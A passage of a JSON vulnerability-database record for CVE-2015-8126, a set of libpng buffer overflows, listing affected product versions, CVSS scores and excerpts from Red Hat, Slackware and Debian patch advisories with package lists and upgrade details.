{
"_id": null,
"model": "flex system manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.3.3.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.767.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1292.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1058.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.129"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.21"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.52"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.41"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.218"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.68"
},
{
"_id": null,
"model": "websphere real time sr9 fp10",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.205"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.83"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.78"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.565.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.567.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.238"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.656.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.53"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.66"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1033.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.788.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.691.0"
}
],
"sources": [
{
"db": "BID",
"id": "77568"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-246"
},
{
"db": "NVD",
"id": "CVE-2015-8126"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "135558"
},
{
"db": "PACKETSTORM",
"id": "135557"
},
{
"db": "PACKETSTORM",
"id": "135339"
},
{
"db": "PACKETSTORM",
"id": "137932"
},
{
"db": "PACKETSTORM",
"id": "135341"
}
],
"trust": 0.5
},
"cve": "CVE-2015-8126",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2015-8126",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-86087",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2015-8126",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201511-246",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-86087",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2015-8126",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-86087"
},
{
"db": "VULMON",
"id": "CVE-2015-8126"
},
{
"db": "CNNVD",
"id": "CNNVD-201511-246"
},
{
"db": "NVD",
"id": "CVE-2015-8126"
}
]
},
"description": {
"_id": null,
"data": "Multiple buffer overflows in the (1) png_set_PLTE and (2) png_get_PLTE functions in libpng before 1.0.64, 1.1.x and 1.2.x before 1.2.54, 1.3.x and 1.4.x before 1.4.17, 1.5.x before 1.5.24, and 1.6.x before 1.6.19 allow remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a small bit-depth value in an IHDR (aka image header) chunk in a PNG image. libpng is prone to multiple heap-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. \nAttackers may leverage these issues to execute arbitrary code on the affected system. Failed attacks will cause denial-of-service conditions. libpng is a PNG reference library that can create, read and write PNG graphics files. 6) - i386, x86_64\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Critical: java-1.7.1-ibm security update\nAdvisory ID: RHSA-2016:0099-01\nProduct: Red Hat Enterprise Linux Supplementary\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-0099.html\nIssue date: 2016-02-02\nCVE Names: CVE-2015-5041 CVE-2015-7575 CVE-2015-7981 \n CVE-2015-8126 CVE-2015-8472 CVE-2015-8540 \n CVE-2016-0402 CVE-2016-0448 CVE-2016-0466 \n CVE-2016-0483 CVE-2016-0494 \n=====================================================================\n\n1. Summary:\n\nUpdated java-1.7.1-ibm packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 6 and 7 Supplementary. \n\nRed Hat Product Security has rated this update as having Critical security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client Supplementary (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Supplementary (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node Supplementary (v. 6) - x86_64\nRed Hat Enterprise Linux Server Supplementary (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Supplementary (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Supplementary (v. 7) - x86_64\n\n3. Description:\n\nIBM Java SE version 7 Release 1 includes the IBM Java Runtime Environment\nand the IBM Java Software Development Kit. \n\nThis update fixes several vulnerabilities in the IBM Java Runtime\nEnvironment and the IBM Java Software Development Kit. Further information\nabout these flaws can be found on the IBM Java Security alerts page, listed\nin the References section. (CVE-2015-5041, CVE-2015-7575, CVE-2015-7981,\nCVE-2015-8126, CVE-2015-8472, CVE-2015-8540, CVE-2016-0402, CVE-2016-0448,\nCVE-2016-0466, CVE-2016-0483, CVE-2016-0494)\n\nNote: This update also disallows the use of the MD5 hash algorithm in the\ncertification path processing. The use of MD5 can be re-enabled by removing\nMD5 from the jdk.certpath.disabledAlgorithms security property defined in\nthe java.security file. \n\nAll users of java-1.7.1-ibm are advised to upgrade to these updated\npackages, containing the IBM Java SE 7R1 SR3-FP30 release. All running\ninstances of IBM Java must be restarted for the update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1276416 - CVE-2015-7981 libpng: Out-of-bounds read in png_convert_to_rfc1123\n1281756 - CVE-2015-8126 CVE-2015-8472 libpng: Buffer overflow vulnerabilities in png_get_PLTE/png_set_PLTE functions\n1289841 - CVE-2015-7575 TLS 1.2 Transcipt Collision attacks against MD5 in key exchange protocol (SLOTH)\n1291312 - CVE-2015-8540 libpng: underflow read in png_check_keyword()\n1298906 - CVE-2016-0494 ICU: integer signedness issue in IndicRearrangementProcessor (OpenJDK 2D, 8140543)\n1298957 - CVE-2016-0402 OpenJDK: URL deserialization inconsistencies (Networking, 8059054)\n1299073 - CVE-2016-0448 OpenJDK: logging of RMI connection secrets (JMX, 8130710)\n1299385 - CVE-2016-0466 OpenJDK: insufficient enforcement of totalEntitySizeLimit (JAXP, 8133962)\n1299441 - CVE-2016-0483 OpenJDK: incorrect boundary check in JPEG decoder (AWT, 8139017)\n1302689 - CVE-2015-5041 IBM JDK: J9 JVM allows code to invoke non-public interface methods\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop Supplementary (v. 6):\n\ni386:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\n\nx86_64:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Supplementary (v. 6):\n\nx86_64:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Supplementary (v. 6):\n\ni386:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\n\nppc64:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.ppc64.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.ppc64.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.ppc64.rpm\njava-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.ppc64.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.ppc64.rpm\n\ns390x:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.s390x.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.s390x.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.s390x.rpm\njava-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.s390x.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.s390x.rpm\n\nx86_64:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Supplementary (v. 6):\n\ni386:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.i686.rpm\n\nx86_64:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.2.el6_7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Supplementary (v. 7):\n\nx86_64:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.i686.rpm\njava-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.i686.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Supplementary (v. 7):\n\nx86_64:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.i686.rpm\njava-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.i686.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Supplementary (v. 7):\n\nppc64:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.ppc.rpm\njava-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.ppc64.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.1.el7.ppc64.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.ppc.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.ppc64.rpm\njava-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.1.el7.ppc64.rpm\njava-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.1.el7.ppc.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.1.el7.ppc64.rpm\n\nppc64le:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.ppc64le.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.1.el7.ppc64le.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.ppc64le.rpm\njava-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.1.el7.ppc64le.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.1.el7.ppc64le.rpm\n\ns390x:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.s390.rpm\njava-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.s390x.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.1.el7.s390x.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.s390.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.s390x.rpm\njava-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.1.el7.s390x.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.1.el7.s390x.rpm\n\nx86_64:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.i686.rpm\njava-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.i686.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Supplementary (v. 7):\n\nx86_64:\njava-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.i686.rpm\njava-1.7.1-ibm-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-demo-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.i686.rpm\njava-1.7.1-ibm-devel-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-jdbc-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-plugin-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\njava-1.7.1-ibm-src-1.7.1.3.30-1jpp.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-5041\nhttps://access.redhat.com/security/cve/CVE-2015-7575\nhttps://access.redhat.com/security/cve/CVE-2015-7981\nhttps://access.redhat.com/security/cve/CVE-2015-8126\nhttps://access.redhat.com/security/cve/CVE-2015-8472\nhttps://access.redhat.com/security/cve/CVE-2015-8540\nhttps://access.redhat.com/security/cve/CVE-2016-0402\nhttps://access.redhat.com/security/cve/CVE-2016-0448\nhttps://access.redhat.com/security/cve/CVE-2016-0466\nhttps://access.redhat.com/security/cve/CVE-2016-0483\nhttps://access.redhat.com/security/cve/CVE-2016-0494\nhttps://access.redhat.com/security/updates/classification/#critical\nhttp://www.ibm.com/developerworks/java/jdk/alerts/\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWsMJfXlSAg2UNWIIRArTCAKCFip8hWmQOb8eehCM0Y8CLbk2B1ACbBc+i\nCzP3qtAPz0FpC4vXlhIcXOg=\n=235r\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. (CVE-2015-4734, CVE-2015-4803, CVE-2015-4805,\nCVE-2015-4806, CVE-2015-4810, CVE-2015-4835, CVE-2015-4840, CVE-2015-4842,\nCVE-2015-4843, CVE-2015-4844, CVE-2015-4860, CVE-2015-4871, CVE-2015-4872,\nCVE-2015-4882, CVE-2015-4883, CVE-2015-4893, CVE-2015-4902, CVE-2015-4903,\nCVE-2015-5006, CVE-2015-5041, CVE-2015-7575, CVE-2015-7981, CVE-2015-8126,\nCVE-2015-8472, CVE-2015-8540, CVE-2016-0264, CVE-2016-0363, CVE-2016-0376,\nCVE-2016-0402, CVE-2016-0448, CVE-2016-0466, CVE-2016-0483, CVE-2016-0494,\nCVE-2016-0686, CVE-2016-0687, CVE-2016-3422, CVE-2016-3426, CVE-2016-3427,\nCVE-2016-3443, CVE-2016-3449)\n\nRed Hat would like to thank Andrea Palazzo of Truel IT for reporting the\nCVE-2015-4806 issue. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/libpng-1.4.17-i486-1_slack14.1.txz: Upgraded. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7981\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8126. \n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/libpng-1.2.54-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/libpng-1.2.54-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/libpng-1.4.17-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/libpng-1.4.17-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/libpng-1.4.17-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/libpng-1.4.17-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/libpng-1.4.17-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/libpng-1.4.17-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/libpng-1.4.17-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/libpng-1.4.17-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libpng-1.6.19-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libpng-1.6.19-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\nc6eb0eeb425af17d02655f2f9fa69723 libpng-1.2.54-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\nee85a731b10fe3d5767b97e91d6bfc1f libpng-1.2.54-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n3d6d26c2cdd0f8ffc9d4ee4284ebdfc7 libpng-1.4.17-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n2b9beff2066d8cd2530c4db6878f3644 libpng-1.4.17-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n36f5490f07d75665bab2bc5cccd77437 libpng-1.4.17-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\nb0110d8941fd249c9b99932b7de67990 libpng-1.4.17-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n0e21fde66006e6e86117ba075e8c160d libpng-1.4.17-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n221b16014a862c02e787519a3090812b libpng-1.4.17-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\ncdd3f81e3a487b4aceb1920295c9ffbe libpng-1.4.17-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\ne0f2e5230458bdb77a19dbc09b6eae0e libpng-1.4.17-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n56306097bf7dde2aa757d122d6fb3616 l/libpng-1.6.19-i586-1.txz\n\nSlackware x86_64 -current package:\nd11905e7d052578e96ff10f42b175c89 l/libpng-1.6.19-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg libpng-1.4.17-i486-1_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nCVE-2015-8126\n\n Joerg Bornemann discovered multiple buffer overflow issues in the\n libpng library. \n\nCVE-2016-1630\n\n Mariusz Mlynski discovered a way to bypass the Same Origin Policy\n in Blink/Webkit. \n\nCVE-2016-1631\n\n Mariusz Mlynski discovered a way to bypass the Same Origin Policy\n in the Pepper Plugin API. \n\nCVE-2016-1632\n\n A bad cast was discovered. \n\nCVE-2016-1633\n\n cloudfuzzer discovered a use-after-free issue in Blink/Webkit. \n\nCVE-2016-1634\n\n cloudfuzzer discovered a use-after-free issue in Blink/Webkit. \n\nCVE-2016-1635\n\n Rob Wu discovered a use-after-free issue in Blink/Webkit. \n\nCVE-2016-1636\n\n A way to bypass SubResource Integrity validation was discovered. \n\nCVE-2016-1637\n\n Keve Nagy discovered an information leak in the skia library. \n\nCVE-2016-1638\n\n Rob Wu discovered a WebAPI bypass issue. \n\nCVE-2016-1639\n\n Khalil Zhani discovered a use-after-free issue in the WebRTC\n implementation. \n\nCVE-2016-1640\n\n Luan Herrera discovered an issue with the Extensions user interface. \n\nCVE-2016-1641\n\n Atte Kettunen discovered a use-after-free issue in the handling of\n favorite icons. \n\nCVE-2016-1642\n\n The chrome 49 development team found and fixed various issues\n during internal auditing. Also multiple issues were fixed in\n the v8 javascript library, version 4.9.385.26. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 49.0.2623.75-1~deb8u1. \n\nFor the testing distribution (stretch), these problems will be fixed soon. \n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 49.0.2623.75-1. \n\nWe recommend that you upgrade your chromium-browser packages. \nThe Common Vulnerabilities and Exposures project identifies the\nfollowing problems:\n\nCVE-2015-7981\n\n Qixue Xiao discovered an out-of-bounds read vulnerability in the\n png_convert_to_rfc1123 function. A remote attacker can potentially\n take advantage of this flaw to cause disclosure of information from\n process memory",
"sources": [
{
"db": "NVD",
"id": "CVE-2015-8126"
},
{
"db": "BID",
"id": "77568"
},
{
"db": "VULHUB",
"id": "VHN-86087"
},
{
"db": "VULMON",
"id": "CVE-2015-8126"
},
{
"db": "PACKETSTORM",
"id": "135558"
},
{
"db": "PACKETSTORM",
"id": "135557"
},
{
"db": "PACKETSTORM",
"id": "135339"
},
{
"db": "PACKETSTORM",
"id": "137932"
},
{
"db": "PACKETSTORM",
"id": "135341"
},
{
"db": "PACKETSTORM",
"id": "134619"
},
{
"db": "PACKETSTORM",
"id": "136095"
},
{
"db": "PACKETSTORM",
"id": "134436"
}
],
"trust": 2.07
},
"exploit_availability": {
"_id": null,
"data": [
{
